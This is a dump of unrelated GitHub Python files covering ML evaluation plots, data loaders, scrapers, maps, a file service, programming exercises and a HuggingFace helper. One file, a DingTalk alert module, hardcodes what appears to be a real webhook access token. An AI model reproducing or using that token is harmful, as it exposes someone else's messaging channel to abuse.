\"\"\"\n plt.style.use('ggplot')\n #colors = sns.color_palette('Set2')\n\n fpr, tpr, thresholds = metrics.roc_curve(y_labels, y_score)\n\n plt.figure(figsize=(8,6))\n plt.plot([0,1], [0,1], linestyle='--', label='random')\n plt.plot(fpr, tpr, marker='.')\n plt.title('ROC Curve - {}'.format(clf_name))\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.legend(loc='lower right')\n\n return plt\n\ndef plot_train_test_roc_curve(y_test, y_test_score, y_train, y_train_score, \n clf_name='Binary Classifier'):\n \"\"\"\n plot roc curve for training and test sets on the same graph\n \"\"\"\n plt.style.use('ggplot')\n colors = sns.color_palette('Set2')\n\n fpr_test, tpr_test, thresholds_test = metrics.roc_curve(y_test, y_test_score)\n fpr_train, tpr_train, thresholds_train = metrics.roc_curve(y_train, y_train_score)\n\n plt.figure(figsize=(8,6))\n plt.plot([0,1], [0,1], linestyle='--', label='random')\n plt.plot(fpr_train, tpr_train, color=colors[1], marker='.', label='train set')\n plt.plot(fpr_test, tpr_test, color=colors[0], marker='.', label='test set')\n plt.title('ROC Curve - {}'.format(clf_name))\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate (Recall)')\n plt.legend(loc='lower right')\n\n return plt\n\ndef plot_precision_recall_curve(y_labels, y_score, clf_name='Binary Classifier'):\n \"\"\"\n plot precision-recall curve for set of binary labels and prediction scores\n \"\"\"\n plt.style.use('ggplot')\n colors = sns.color_palette('Set2')\n\n pr, rc, thresholds = metrics.precision_recall_curve(y_labels, y_score)\n\n imb = sum(y_labels==1)/len(y_labels)\n\n plt.figure(figsize=(8,6))\n plt.plot([0,1], [imb,imb], linestyle='--', label='random')\n plt.plot(rc, pr, color=colors[1], marker='.')\n plt.title('Precision-Recall Curve - {}'.format(clf_name))\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n plt.legend()\n\n return plt\n\ndef plot_train_test_precision_recall_curve(y_test, y_test_score, y_train, y_train_score, \n clf_name='Binary Classifier'):\n \"\"\"\n plot precision-recall curve for training and test sets on the same graph\n \"\"\"\n plt.style.use('ggplot')\n colors = sns.color_palette('Set2')\n\n pr_test, rc_test, thresholds_test = metrics.precision_recall_curve(y_test, y_test_score)\n pr_train, rc_train, thresholds_train = metrics.precision_recall_curve(y_train, y_train_score)\n\n imb_test = sum(y_test==1)/len(y_test)\n imb_train = sum(y_train==1)/len(y_train)\n imb_avg = (imb_test + imb_train)/2\n\n plt.figure(figsize=(8,6))\n plt.plot([0,1], [imb_avg, imb_avg], linestyle='--', label='random')\n plt.plot(rc_train, pr_train, color=colors[1], marker='.', label='train set')\n plt.plot(rc_test, pr_test, color=colors[0], marker='.', label='test set')\n plt.title('Precision-Recall Curve - {}'.format(clf_name))\n plt.xlabel('Recall (True Positive Rate)')\n plt.ylabel('Precision')\n plt.legend()\n\n return plt\n\ndef find_threshold_by_recall(y_labels, y_score, recall):\n \n fpr, tpr, thresholds = metrics.roc_curve(y_labels, y_score)\n ix = np.where(np.logical_and(tpr>=recall, tpr<(recall+0.1)))[0][0]\n\n return thresholds[ix]\n\ndef find_kstat(y_labels, y_score):\n\n fpr, tpr, thresholds = metrics.roc_curve(y_labels, y_score)\n kstat = max(tpr-fpr)\n kstat_thresh = thresholds[np.argmax(tpr-fpr)]\n\n return kstat, kstat_thresh\n\ndef display_result_summary(y_test, y_test_score, y_train, y_train_score, \n model_name='Trained Classifier'):\n\n train_auc = metrics.roc_auc_score(y_train, y_train_score)\n train_ar = 2*train_auc-1\n train_ks, train_ks_thresh = find_kstat(y_train, y_train_score)\n\n test_auc = metrics.roc_auc_score(y_test, y_test_score)\n test_ar = 2*test_auc-1\n test_ks, test_ks_thresh = find_kstat(y_test, y_test_score)\n\n print('Model Results - {}'.format(model_name))\n print('')\n print('+-------------------------------------------+')\n print('| Metric | Test Set | Train Set |')\n print('+-------------------------------------------+')\n print('| AUC Score | {:.5f} | {:.5f} |'.format(test_auc, train_auc))\n print('+-------------------------------------------+')\n print('| AR Score | {:.5f} | {:.5f} |'.format(test_ar, train_ar))\n print('+-------------------------------------------+')\n print('| KS Stat | {:.5f} | {:.5f} |'.format(test_ks, train_ks))\n print('+-------------------------------------------+')\n\ndef find_divergence(y_labels, y_score):\n \"\"\"\n Find divergence of a binary classifier, with labels 0 and 1\n \"\"\"\n\n y_true = np.array(y_labels)\n y_score1 = y_score[np.where(y_true>0)[0]]\n y_score0 = y_score[np.where(y_true==0)[0]]\n \n div = (np.mean(y_score1)-np.mean(y_score0))**2/(np.var(y_score1)+np.var(y_score0))\n\n return div\n","repo_name":"bl419cam/Machine-Learning-Toolkit","sub_path":"custom_functions.py","file_name":"custom_functions.py","file_ext":"py","file_size_in_byte":9047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10635430238","text":"# Написать свой декоратор, который будет отлавливать ошибки,\n# полученные в ходе выполнения обёрнутой функции,\n# логгировать их и делать raise отловленной ошибки\nimport datetime\n\n\ndef log_err(func):\n def wrap(*args, **kwargs):\n try:\n result = func(*args, **kwargs)\n return result\n except Exception as e:\n print(f'{datetime.datetime.now()} ',\n f'Exception in function {func.__name__}: {e}')\n raise e\n return wrap\n\n\n@log_err\ndef bad_func(a, b):\n return a / b\n\n\nprint(bad_func(2, 0))\n","repo_name":"vadimhl/task.education.nixsolutions.com","sub_path":"task_03.py","file_name":"task_03.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27366447560","text":"import pandas as pd\nimport json\nimport os\nimport numpy as np\n\nclass Feature_extraction:\n\tdef __init__(self,data_path, dfs):\n\t\t\n\t\tself.data_path = data_path\n\t\tself.dfs = dfs\n\n\t\tself.file_list = [f for f in os.listdir(self.data_path) if not f.startswith('.')] \n\t\tself.n_files = len(self.file_list)\n\n\t\tself.ends=[]\n\n\n\t\tfor fi, file_id in enumerate(self.file_list):\n\t\t\tself.meta = json.load(open(os.path.join(self.data_path,file_id, 'meta.json')))\n\t\t\tself.ends.append(self.meta['end'])\n\t\t\n\n\n\tdef get_features(self,time_window,fxn_list):\n\t\t'''time_window in ms'''\n\n\t\tlower = np.arange(0,self.ends[0],time_window)\n\t\tupper = np.arange(time_window,self.ends[0]+time_window,time_window)\n\t\t\n\n\t\ttest = self.dfs[0]\n\n\n\t\tsensor_col_n = test.shape[1]\n\t\tarr_test = np.array([int(self.ends[0]/time_window+1),len(fxn_list*sensor_col_n)])\n\n\t\tfor fxn in fxn_list:\n\n\t\t\tfor lb, ub in zip(lower,upper):\n\t\t\t\tprint(lb,ub)\n\n\t\t\t\tdata = self._slice_df(test,lb,ub)\n\t\t\t\t\n\t\t\t\tfor i in range(sensor_col_n):\n\n\t\t\t\t\tprint(len(data[data.columns[i]]))\n\n\n\n\t\t\t\t# print(fxn(data))\n\n\n\n\n\n\n\tdef _slice_df(self,df,start,end):\n\t\tidx = (df.index>=start) & (df.index<end)\n\t\treturn df[idx] \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"alebyk113/sph_ch_accel","sub_path":"feature_ext_.py","file_name":"feature_ext_.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8106206158","text":"from torchvision.datasets import CIFAR10\nimport pytorch_lightning as pl\nfrom torch.utils.data import random_split, DataLoader\nfrom torchvision.transforms import AutoAugment, AutoAugmentPolicy, ToTensor, Compose, Normalize\n# from pl_bolts.transforms.dataset_normalizations import cifar10_normalization\nimport numpy as np\n\ndef get_normalization_parameters(dataset):\n stacked = [np.array(k[0]) for k in dataset]\n stacked = np.stack(stacked, axis=-1)\n means = stacked.mean(axis=(1, 2, 3))\n stds = stacked.std(axis=(1, 2, 3))\n return means, stds\n\nclass CIFAR10_wrapper(pl.LightningDataModule):\n def __init__(self, data_location, batch_size, workers):\n super().__init__()\n self.workers = workers\n self.path = data_location\n self.batch_size = batch_size\n\n def setup(self, stage=None):\n to_tensor = ToTensor()\n train_data = CIFAR10(self.path, train=True, download=True, transform=to_tensor)\n means, stds = get_normalization_parameters(train_data)\n normalization_transform = Normalize(mean=means, std=stds)\n augment_policy = AutoAugment(AutoAugmentPolicy.CIFAR10)\n\n transforms_train = Compose([\n augment_policy,\n to_tensor,\n normalization_transform\n ])\n\n transforms_test = Compose([\n to_tensor,\n normalization_transform\n ])\n\n train_data = CIFAR10(self.path, train=True, download=True, transform=transforms_train)\n self.cifar_test = CIFAR10(self.path, train=False, download=True, transform=transforms_test)\n self.cifar_train, self.cifar_val = random_split(train_data, (.90, .1))\n\n\n def train_dataloader(self):\n return DataLoader(self.cifar_train, self.batch_size, shuffle=True, num_workers=self.workers)\n\n def val_dataloader(self):\n return DataLoader(self.cifar_val, self.batch_size, num_workers=self.workers)\n\n def test_dataloader(self):\n return DataLoader(self.cifar_test, self.batch_size, num_workers=self.workers)","repo_name":"Hierakonpolis/test_task","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4258435651","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 11 12:13:25 2019\n\n@author: rowan.martin-hughes\n\"\"\"\n\nimport atomica as at\nimport sciris as sc\nimport numpy as np\n\nfrom os import sep, path\n\nfrom datetime import datetime\ntime = datetime.now().strftime(\"%H:%M:%S\")\ndate = datetime.now().strftime(\"%Y%m%d\")\n\ndef _get_gdrive_folder(country=None):\n import socket\n user = socket.gethostname()\n \n if country is None:\n country_str = ''\n else:\n country_str = '%s%sProject%s'%(country, sep, sep)\n\n apps_folder = '../'\n user = 'rmh'\n user_initials = 'rmh'\n \n return path.join(path.abspath(apps_folder),''), user_initials # ensure trailing separator\n\ngdrive, user_initials = _get_gdrive_folder()\ndef user_version(): #defined as a function as 'date' might be changed to match previous results\n return '%s_%s' % (date, user_initials)\n\nroot = path.abspath(path.join(at.parent_dir(),'..'))+path.sep # repository root dir\n\ndef get_malaria_analyses_version():\n return at.fast_gitinfo(__file__)\n\ndef try_loading(function, fnargs, obj_filename, obj_folder, load_objects=True, run_if_unfound=True):\n \"\"\"helper function to try loading a pre-run object from a folder, or recreate it if not available\"\"\"\n try:\n assert load_objects\n obj = sc.loadobj(obj_filename, folder=obj_folder)\n except:\n if run_if_unfound:\n obj = function(**fnargs)\n sc.saveobj(obj=obj, filename=obj_filename, folder=obj_folder)\n else:\n return None\n return obj\n\n\n\ndef get_apps_folder(country=None):\n \n if country is None:\n country_str = ''\n else:\n country_str = country #'%s%sProject%s'%(country, sep, sep)\n \n apps_folder = gdrive + country_str\n \n return apps_folder\n\ndef get_paths(folder, inclusions=[], extensions=['.xlsx'], exclusions=['~'],\n version='latest', verbose=True, case_sensitive=False, folder_depth=0):\n #find the highest alphabetical databook, framework, and progbook in the project_folder\n #if multiple exist, would pick the one with the highest date\n #ignore anything with a '~' as these are temporary files\n from glob import glob\n contains = sc.promotetolist(inclusions)+sc.promotetolist(extensions)\n excludes = sc.promotetolist(exclusions)\n extra_str = '*%s'%(sep) * folder_depth + '*'\n files = glob(folder+extra_str)\n if case_sensitive:\n valid_files = [file for file in files if np.array([con.lower() in file.lower() for con in contains]).all()]\n valid_files = [file for file in valid_files if np.array([not exc.lower() in file.lower() for exc in excludes]).all()]\n else:\n valid_files = [file for file in files if np.array([con in file for con in contains]).all()]\n valid_files = [file for file in valid_files if np.array([not exc in file for exc in excludes]).all()]\n \n if len(valid_files)==0:\n if verbose: print('Could not find a file containing all of %s and none of %s in folder %s'%(contains, excludes, folder))\n return None\n elif version=='latest':\n valid_files = valid_files[-1]\n \n if verbose: print('Found \\'%s\\' file(s): %s'%(inclusions, valid_files))\n return valid_files\n \n \ndef save_run_info(run_info: str = '', folder=None, filename=None):\n if filename is None:\n filename = 'Run info_%s.txt'%(date)\n if folder is None:\n folder = '' #save it into the script folder\n \n filepath = folder+filename\n \n run_info+= 'Date %s, %s\\n'%(date, time)\n run_info+= 'Atomica version %s\\n'%at.__version__\n run_info+= 'Atomica git details %s\\n'%(at.__gitinfo__)\n run_info+= 'Sciris version %s, %s\\n'%(sc.__version__, sc.__versiondate__)\n run_info+= 'Malaria analyses git details %s\\n'%(get_malaria_analyses_version())\n \n try:\n file = open(filepath, 'w+')\n file.write(run_info)\n file.close()\n return True\n except:\n print('WARNING: Could not save results to %s, file is probably already open.'%(filepath))\n return False\n \ndef export_raw_results(results, results_folder):\n if isinstance(results, at.Project):\n results = results.results.values()\n \n import os\n os.makedirs(results_folder, exist_ok=True)\n for result in results:\n results_path = results_folder+'export_raw_%s_%s.xlsx'%(result.name, date)\n try:\n result.export_raw(filename=results_path)\n except: 'WARNING: could not save raw results %s.'%(results_path)\n\ndef getpops(P, pop='hum'):\n return [key for key, details in P.data.pops.items() if details['type']==pop]\n\ndef allequal(x):\n '''return true if all elements of a list/array are equal'''\n return len(set(x)) <=1\n\ndef sigfigs(x):\n if type(x)==str: return x\n return sc.sigfig(X=x, sigfigs=2, SI=False, sep=True, keepints=False)\n\ndef start_logging(filename=None, folder=None):\n \"\"\"save an output file of console output\"\"\"\n import logging\n import os\n \n if filename is None: filename='script_logging.log'\n \n if not folder is None:\n try:\n os.makedirs(folder, exist_ok=True)\n except:\n print('ERROR: Could not create a results folder at %s'%(folder))\n return False\n \n logger = logging.getLogger()\n h = logging.FileHandler(folder+filename,mode='w')\n logger.addHandler(h)\n return logger\n\n\n\n\n\ndef _filter_pops_by_output(result, output) -> list:\n \"\"\"\n Helper function for plotting quantities\n Copied from results.py\n\n With population types, a given output/output aggregation may only be defined\n in a subset of populations. To deal with this when plotting Result objects,\n it's necessary to work out which population the requested output aggregation can be\n plotted in. This function takes in an output definition and returns a list of populations\n matching this.\n\n :param output: An output aggregation string e.g. 'alive' or ':ddis' or {['lt_inf','lteu']} (supported by PlotData/get_variable)\n :return: A list of population code names\n\n \"\"\"\n\n if sc.isstring(output):\n vars = result.get_variable(output)\n elif isinstance(output, list):\n vars = result.get_variable(output[0])\n elif isinstance(output, dict):\n v = list(output.values())[0]\n if isinstance(v, list):\n vars = result.get_variable(v[0])\n elif sc.isstring(v):\n # It could be a function aggregation or it could be a single one\n _, deps = parse_function(v)\n vars = result.get_variable(deps[0])\n else:\n raise Exception('Could not determine population type')\n return [x.pop.name for x in vars]\n\ndef get_data(results, output, tdict):\n \"\"\"\n Convert an output to a DataFrame for a group of results\n Copied from results.py and adapted\n\n This function takes in a list of results, and an output specification recognised by :class:`PlotData`.\n It extracts the outputs from all results and stores them in a 3-level MultiIndexed dataframe, which is\n returned. The index levels are the name of the output, the name of the results, and the populations.\n\n In addition, this function attempts to aggregate the outputs, if the units of the outputs matches\n known units. If the units lead to anver obvious use of summation or weighted averating, it will be used.\n Otherwise, the output will contain NaNs for the population-aggregated results, which will appear as empty\n cells in the Excel spreadsheet so the user is able to fill them in themselves.\n\n :param results: List of Results\n :param output_name: The name to use for the output quantity\n :param output: An output specification/aggregation supported by :class:`PlotData`\n :param tdict: Outputs will be interpolated onto the times in this dictionary of lists of tvecs (typically would be annual)\n :return: a PlotData\n\n \"\"\"\n output_name = output\n \n pops = _filter_pops_by_output(results[0], output)\n pop_labels = {x: y for x, y in zip(results[0].pop_names, results[0].pop_labels) if x in pops}\n data = dict()\n \n popdata = at.PlotData(results, pops=pops, outputs=output)\n if popdata.series[0].units in {at.FrameworkSettings.QUANTITY_TYPE_NUMBER, results[0].model.pops[0].comps[0].units}:\n action_fn = sum\n pop_aggregation = 'sum'\n elif popdata.series[0].units in {at.FrameworkSettings.QUANTITY_TYPE_FRACTION,\n at.FrameworkSettings.QUANTITY_TYPE_PROPORTION,\n at.FrameworkSettings.QUANTITY_TYPE_PROBABILITY} or 'prev' in output:\n action_fn = np.mean\n pop_aggregation = 'weighted'\n else:\n print ('Not clear which units to use over time for %s, sum.'%(output_name))\n action_fn = sum\n\n for tname, tvals in tdict.items():\n popdata = at.PlotData(results, pops=pops, outputs=output)\n assert len(popdata.outputs) == 1, 'Framework plot specification should evaluate to exactly one output series - there were %d' % (len(popdata.outputs))\n popdata.interpolate(tvals)\n \n for result in popdata.results:\n for pop_name in popdata.pops:\n time_vals = popdata[result, pop_name, popdata.outputs[0]].vals\n \n data[(output_name, popdata.results[result], pop_labels[pop_name], tname)] = action_fn(time_vals)\n \n \n agg_popdata = at.PlotData(results, outputs=output, pops={'total': pops}, pop_aggregation=pop_aggregation)\n agg_popdata.interpolate(tvals)\n for result in agg_popdata.results:\n data[(output_name, agg_popdata.results[result], 'Total (sum)', tname)] = action_fn(agg_popdata[result, agg_popdata.pops[0], agg_popdata.outputs[0]].vals)\n \n# df = pd.DataFrame(data, index=tvals)\n# df = df.T\n# df.index = df.index.set_names(['output', 'result', 'pop']) # Set the index names correctly so they can be reordered easily\n return data\n\n \ndef export_quick_comparison(results, variables, pops = None, res_names = None, year_dict={'2016': 2016, '2016 - 2030': list(range(2016, 2031)), '2030': 2030},\n filename='parameter comparison.xlsx', folder=None):\n data = [['Parameter (display)', 'Parameter (model)', 'Self-comparison', 'Same-year', 'Population', 'Baseline result', 'Baseline year(s)', 'Baseline value',\n 'Outcome result', 'Outcome year(s)', 'Outcome value', 'Percentage difference', 'Absolute difference']]\n all_resnames = [res.name for res in results]\n if res_names is None:\n res_names = all_resnames\n if not pops is None:\n comp_pops = pops #same for all\n \n \n for var in variables:\n var_name = results[0].model.framework.get_variable(var)[0]['display name'] #assume results all have the same framework...\n\n for brn in res_names:\n for byn, bys in year_dict.items():\n bys = sc.promotetolist(bys)\n for orn in res_names:\n for oyn, oys in year_dict.items():\n oys = sc.promotetolist(oys)\n #it only makes sense to compare changes between the same result and different years, or the same year and different results.\n if bys == oys or (brn == orn and len(oys) == len(bys)): \n df = get_data(results=results, output=var, tdict = year_dict)\n# print (df.keys())\n if pops is None:\n comp_pops = list(set([x[2] for x in df.keys()])) #assume pops are the same through all results.......\n for pop in comp_pops:\n self_comp = 'Y' if brn == orn else ''\n same_year = 'Y' if bys == oys else ''\n base_val = df[var, brn, pop, byn]\n out_val = df[var, orn, pop, oyn]\n \n percent_diff = (out_val - base_val)/max(base_val, 1e-15)\n abs_diff = (out_val - base_val)\n \n data.append([var_name, var, self_comp, same_year, pop, brn, byn, base_val,\n orn, oyn, out_val, percent_diff, abs_diff])\n sc.savespreadsheet(filename=filename, data=data, folder=folder)\n","repo_name":"rihickson/vivax-primaquine-Cambodia","sub_path":"code/malaria_utils/utils_malaria.py","file_name":"utils_malaria.py","file_ext":"py","file_size_in_byte":12466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"9662720858","text":"import os\nimport openai\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\n# Get prompt from command line argument\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('prompt', type=str, help='The prompt for the OpenAI API')\nargs = parser.parse_args()\n\nprint(args.prompt)\n\nresponse = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=args.prompt,\n temperature=0.7,\n max_tokens=256,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0\n)\n\nprint(response)\n","repo_name":"jakedowns/MyGPTApp","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"36838357156","text":"import pandas as pd\nimport folium\nfrom folium import plugins\nimport os\n \nstate_geo = os.path.join('.', 'us-states.json') # https://github.com/python-visualization/folium/blob/master/tests/us-states.json\n\ndataset = pd.read_csv('../datasets/longitudeFixed.csv')\n\nm = folium.Map(location=[25, 24], zoom_start=3,)\nfolium.TileLayer('openstreetmap').add_to(m)\nfolium.TileLayer('Stamen Terrain').add_to(m)\n\nplugins.Fullscreen(\n position='topright',\n title='Expand me',\n title_cancel='Exit me',\n force_separate_button=True\n).add_to(m)\n\nminimap = plugins.MiniMap()\nm.add_child(minimap)\n\n\ndict_states = {}\nfor index, row in dataset.iterrows():\n state = row['provstate']\n if state in dict_states:\n num = dict_states[state]\n dict_states[state] = num + 1\n else:\n dict_states[state] = 1\n\narray = []\nfor state, count in dict_states.items():\n array.append([state,count])\ndata_states_num_attacks = pd.DataFrame(array, columns = ['state', 'count'])\n\nbins = [0.0,58,116,174,232,290,348,406,464,579.0]\n\nfolium.Choropleth(\n geo_data=state_geo,\n name='States',\n data=data_states_num_attacks,\n columns=['state', 'count'],\n key_on='feature.properties.name',\n fill_color='YlGn',\n fill_opacity=0.7,\n line_opacity=0.2,\n legend_name='Number of attacks',\n bins=bins\n).add_to(m)\n\nfolium.LayerControl().add_to(m)\n \n# Save to html\nm.save('html_files/map_states.html')\n","repo_name":"FerranAgulloLopez/DataMiningGlobalTerrorism","sub_path":"second_delivery/map/map_states.py","file_name":"map_states.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"651589457","text":"import unittest\nimport os\nimport numpy as np\nfrom subprocess import call\n\nimport z5py\n\nfrom testClass import McLuigiTestCase\n\n\nclass TestDataTasks(McLuigiTestCase):\n\n @classmethod\n def setUpClass(cls):\n super(TestDataTasks, cls).setUpClass()\n call(['python', './executables/workflow.py', 'learn_rf'])\n\n @classmethod\n def tearDownClass(cls):\n super(TestDataTasks, cls).tearDownClass()\n\n def check_segmentation(self, res_path):\n self.assertTrue(os.path.exists(res_path))\n result = z5py.File(res_path, use_zarr_format=False)['data'][:]\n self.assertEqual(result.shape, self.expected_shape)\n clusters = np.unique(result)\n self.assertGreater(len(clusters), self.expected_shape[0])\n\n def test_multicut_wf(self):\n call(['python', './executables/workflow.py', 'mc'])\n seg_path = './cache/MulticutSegmentation_standard.h5'\n self.check_segmentation(seg_path)\n\n def test_blockwise_wf(self):\n call(['python', './executables/workflow.py', 'blockwise_mc'])\n seg_path = './cache/BlockwiseMulticutSegmentation_L1_20_256_256_5_50_50_standard.h5'\n self.check_segmentation(seg_path)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"constantinpape/mc_luigi","sub_path":"tests/unit_tests/test_workflow_tasks.py","file_name":"test_workflow_tasks.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"28402250845","text":"from .directory.model import Directory\nfrom .file.model import File\nfrom .path.model import Path\nfrom .directory import service as ds\nfrom .file import service as fs\nfrom fs.osfs import OSFS\n\n\ndef mv(sor, tar, overwrite=True):\n if isinstance(sor, Directory):\n ds.mv(sor, tar, overwrite)\n else:\n fs.mv(sor, tar, overwrite)\n\n\ndef cp(sor, tar, overwrite=True):\n if isinstance(sor, Directory):\n ds.cp(sor, tar, overwrite)\n else:\n fs.cp(sor, tar, overwrite)\n\n\ndef rm(sor):\n if isinstance(sor, Directory):\n ds.rm(sor)\n else:\n fs.rm(sor)\n\n\nclass EnsureFS:\n def __init__(self, fs_or_path, default_filesystem=OSFS):\n if isinstance(fs_or_path, str):\n self.fs = default_filesystem(Path(fs_or_path).abs)\n self.need_close = True\n else:\n self.fs = fs_or_path\n self.need_close = False\n\n def __enter__(self):\n return self.fs\n\n def __exit__(self, type, value, trackback):\n if self.need_close:\n self.fs.close()\n\n\ndef launch_web_ui(host, port, version=0.1, debug=True):\n from flask import Flask, url_for\n from flask_cors import CORS, cross_origin\n from flask_restful import Api\n from .web import add_apis\n app = Flask(__name__)\n CORS(app)\n api = Api(app)\n add_apis(api, '/api/v{0}'.format(version))\n\n @app.route(\"/site-map\")\n def site_map():\n import json\n links = []\n for rule in app.url_map.iter_rules():\n if rule.endpoint == 'static':\n continue\n links.append(\n (url_for(rule.endpoint, path='%252Ftmp%252Ftest'), rule.endpoint))\n return json.dumps(links, indent=4, separators=(',', ':'))\n app.run(host, port, debug=debug)\n","repo_name":"Hong-Xiang/dxfs","sub_path":"src/python/dxl/fs/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26081644336","text":"from bs4 import BeautifulSoup\r\nfrom urllib.request import urlopen\r\n\r\n# with open(\"F:\\Programming Project Misc\\warner.html\") as fp:\r\n# soup = BeautifulSoup(fp, 'html.parser')\r\n\r\nsoup = BeautifulSoup(open(\"F:\\Programming Project Misc\\statguruinfo.html\"), 'html.parser')\r\n\r\nnames = soup.find('select', 'name=team')\r\n\r\n\r\n#seperate by select tag into a list\r\ndef extract_select_tags():\r\n select_tags = []\r\n for row in soup.find_all('select'):\r\n select_tags.append(row)\r\n return select_tags\r\n\r\nmyList = extract_select_tags()\r\n\r\n\r\n\r\n#remove html tags from a list of text\r\ndef remove_html_tags(text):\r\n \"\"\"Remove html tags from a string\"\"\"\r\n import re\r\n clean = re.compile('<.*?>')\r\n return re.sub(clean, '', text)\r\n\r\ncleanList = []\r\nfor text in myList:\r\n #append the text to a list\r\n cleanList.append(remove_html_tags(str(text)))\r\n\r\n\r\nlen(cleanList)\r\n\r\nfor text in cleanList:\r\n print(text)","repo_name":"edwarddhowarth/CricketStatDashboard","sub_path":"statguruinfoextractUtil.py","file_name":"statguruinfoextractUtil.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"74504725306","text":"#i dont know if its right\n# her's 2,3 is diffrent and mine is diffrent , mine is 2nd row and 3rd column\n\n# 🚨 Don't change the code below\nrow1 = [\"1️\",\"2️\",\"3️\"]\nrow2 = [\"4️\",\"5️\",\"6️\"]\nrow3 = [\"7️\",\"8️\",\"9️\"]\nmap = [row1, row2, row3]\nprint(f\"{row1}\\n{row2}\\n{row3}\")\nposition = input(\"Where do you want to put the treasure?Enter positons , seprated \")\n# 🚨 Don't change the code above 👆\n\n#Write your code below this row 👇\n\npos = position.split(\",\")\nif int(pos[0]) <=3 and int(pos[1]) <= 3:\n\n map[int(pos[0])-1][int(pos[1])-1] = \"X\"\n print(map[int(pos[0])-1][int(pos[1])-1])\n print(f\"{row1}\\n{row2}\\n{row3}\")\n\n\nelse:\n print(\"invalid input\")\n\n\n#Write your code above this row 👆\n\n# 🚨 Don't change the code below 👇\n#print(map)","repo_name":"yatin-kundra/python-udemy-code-","sub_path":"Beginner -- python -- 100 days/trasure-map(test-day4).py","file_name":"trasure-map(test-day4).py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16614614289","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n__author__ = 'qing.li'\n\"\"\"\nimport requests\n\nWEB_HOOK = 'https://oapi.dingtalk.com/robot/send?access_token=382989c022d5fe882e9c6aa12e1f357b97176b4f4b429d32122dd7b888e5f5a4'\n\n\nclass Alert:\n def __init__(self):\n self.web_hook = WEB_HOOK\n self.headers = {\n 'Content-Type': 'application/json; charset=utf-8',\n }\n\n def send_text(self, msg):\n \"\"\"\n 钉钉告警,发送text消息\n :param msg:\n :return:\n \"\"\"\n data = {'msgtype': \"text\"}\n if self._is_text_null(msg):\n data['text'] = {'content': msg}\n else:\n raise ValueError(\"消息不能为空\")\n self._ding_post(data)\n\n def _is_text_null(self, msg):\n if not msg:\n return False\n else:\n return True\n\n def _ding_post(self, data):\n \"\"\"\n 发送消息(内容UTF-8编码)\n :param data: 消息数据(字典)\n \"\"\"\n try:\n response = requests.post(self.web_hook, headers=self.headers, json=data)\n\n except requests.exceptions.HTTPError as exc:\n print(\"报警消息发送失败, HTTP error: %d, reason: %s\" % (exc.response.status_code, exc.response.reason))\n\n except requests.exceptions.ConnectionError:\n print(\"报警消息发送失败,HTTP connection error!\")\n\n else:\n send_result = response.json()\n if send_result['errcode']:\n print(\"钉钉机器人消息发送失败,原因:%s\" % send_result['errmsg'])\n\n","repo_name":"QingqinLi/mooc_ui_web","sub_path":"utils/alert.py","file_name":"alert.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"11960462436","text":"from abc import ABC, abstractmethod\n\nimport requests\nimport streamlit as st\n\n\nclass HuggingFaceTask(ABC):\n \"\"\"Abstract class for HuggingFace tasks.\"\"\"\n\n def __init__(self, name):\n self.name = name\n self.api_token = st.secrets[\"HF_API_KEY\"]\n self.headers = {\"Authorization\": f\"Bearer {self.api_token}\"}\n self.api_root = \"https://api-inference.huggingface.co/models/\"\n self.api_url = None\n\n @abstractmethod\n def setup(self):\n \"\"\"Abstract method.\"\"\"\n\n @abstractmethod\n def run(self):\n \"\"\"Abstract method.\"\"\"\n\n\nclass HuggingFaceTaskMixin:\n \"\"\"Mixin class.\"\"\"\n\n def process_input(self, api_url, headers, text_lines, labels=None):\n \"\"\"Query HF API.\"\"\"\n output = []\n for row in text_lines:\n if labels is not None:\n payload = {\n \"inputs\": row,\n \"parameters\": {\"candidate_labels\": labels},\n \"options\": {\"wait_for_model\": True},\n }\n else:\n payload = {\n \"inputs\": row,\n \"options\": {\"wait_for_model\": True},\n }\n\n try:\n response = requests.post(\n api_url, headers=headers, json=payload, timeout=10\n )\n except requests.exceptions.Timeout:\n st.error(\"HTTP connection time out. Please try again!\", icon=\"🚨\")\n return []\n\n if response.status_code != 200:\n st.error(f\"Query error code: {response.status_code}\", icon=\"🚨\")\n 